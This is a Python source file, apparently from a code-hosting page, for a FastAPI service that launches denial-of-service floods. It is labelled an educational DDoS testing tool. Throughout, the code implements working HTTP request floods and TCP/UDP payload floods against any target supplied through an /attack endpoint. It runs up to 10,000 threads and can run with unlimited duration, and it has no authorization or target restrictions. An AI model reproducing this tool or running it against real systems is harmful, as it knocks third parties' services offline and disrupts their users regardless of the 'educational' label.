File size: 4,963 Bytes
f39ffbb
f707f27
 
8df8350
 
 
 
 
76c30e9
 
 
 
8df8350
faf62e8
8df8350
 
faf62e8
76c30e9
f39ffbb
8df8350
 
 
76c30e9
f39ffbb
f707f27
76c30e9
 
 
 
 
 
 
 
 
 
 
 
f707f27
8df8350
 
f707f27
8df8350
 
f707f27
8df8350
 
f707f27
8df8350
 
76c30e9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
faf62e8
8df8350
 
 
f39ffbb
a246d27
76c30e9
a246d27
76c30e9
 
 
 
 
f39ffbb
76c30e9
 
 
 
 
 
 
 
 
 
 
 
 
f39ffbb
a246d27
 
 
 
 
 
f39ffbb
8df8350
 
 
 
 
 
 
 
 
 
faf62e8
a246d27
 
 
8df8350
a246d27
 
 
8df8350
76c30e9
 
 
 
8df8350
 
 
 
 
 
 
 
 
 
 
 
faf62e8
 
a246d27
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# main.py
import uvicorn
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
import threading
import requests
import time
import logging
import socket
import random
import struct
from typing import Optional, Literal
from concurrent.futures import ThreadPoolExecutor

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

app = FastAPI(title="Layer 7 + Layer 4 DDoS Testing Tool (Educational Only)")

# Global attack control
attack_active = False
attack_thread = None
executor = ThreadPoolExecutor(max_workers=10000)  # Maximum power mode

class AttackConfig(BaseModel):
    target: str
    port: int = 80
    duration: int = 30  # -1 for unlimited
    threads: int = 100  # -1 for unlimited
    attack_type: Literal["layer7", "tcp", "udp"] = "layer7"
    payload_size: int = 1024  # For Layer 4 attacks

def generate_payload(size: int) -> bytes:
    """Generate random payload for Layer 4 attacks"""
    return bytes(random.getrandbits(8) for _ in range(size))

def layer7_attack(target_url: str):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "keep-alive",
        "Cache-Control": "no-cache",
        "Pragma": "no-cache"
    }
    session = requests.Session()
    while attack_active:
        try:
            session.get(target_url, headers=headers, timeout=5, verify=False)
        except:
            pass

def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int):
    sock = None
    try:
        if protocol == "tcp":
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock.connect((target_ip, port))
        else:  # udp
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        while attack_active:
            payload = generate_payload(payload_size)
            if protocol == "tcp":
                sock.send(payload)
            else:
                sock.sendto(payload, (target_ip, port))
            time.sleep(0.01)  # Small delay to prevent CPU overload
    except Exception as e:
        logger.error(f"Layer 4 attack error: {e}")
    finally:
        if sock:
            sock.close()

def start_attack(config: AttackConfig):
    global attack_active, attack_thread
    attack_active = True

    # Determine thread count
    thread_count = config.threads if config.threads != -1 else 10000

    # Build target URL for Layer 7
    if config.attack_type == "layer7":
        protocol = "https" if config.target.startswith("https") else "http"
        target_url = f"{config.target}:{config.port}"
        logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads")

        for _ in range(thread_count):
            executor.submit(layer7_attack, target_url)
    else:
        # Extract IP from target URL if needed
        try:
            target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0])
        except:
            raise HTTPException(status_code=400, detail="Invalid target URL")

        logger.info(f"Starting {config.attack_type.upper()} attack on {target_ip}:{config.port} with {thread_count} threads")

        for _ in range(thread_count):
            executor.submit(layer4_attack, target_ip, config.port, config.attack_type, config.payload_size)

    # Handle unlimited duration (-1)
    if config.duration != -1:
        time.sleep(config.duration)
        stop_attack()
    else:
        logger.info("Attack running indefinitely until manually stopped")

def stop_attack():
    global attack_active
    attack_active = False
    logger.info("Attack stopped.")

@app.post("/attack")
def launch_attack(config: AttackConfig):
    global attack_thread
    if attack_thread and attack_thread.is_alive():
        raise HTTPException(status_code=400, detail="Attack already in progress")

    # Validate thread count
    if config.threads != -1 and config.threads > 10000:
        raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)")

    # Validate duration
    if config.duration != -1 and config.duration > 5000:
        raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)")

    # Validate payload size
    if config.payload_size > 65507:
        raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes")

    attack_thread = threading.Thread(target=start_attack, args=(config,), daemon=True)
    attack_thread.start()
    return {"status": "attack_started", "config": config}

@app.post("/stop")
def stop():
    stop_attack()
    return {"status": "attack_stopped"}

@app.get("/status")
def status():
    return {"attack_active": attack_active}

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)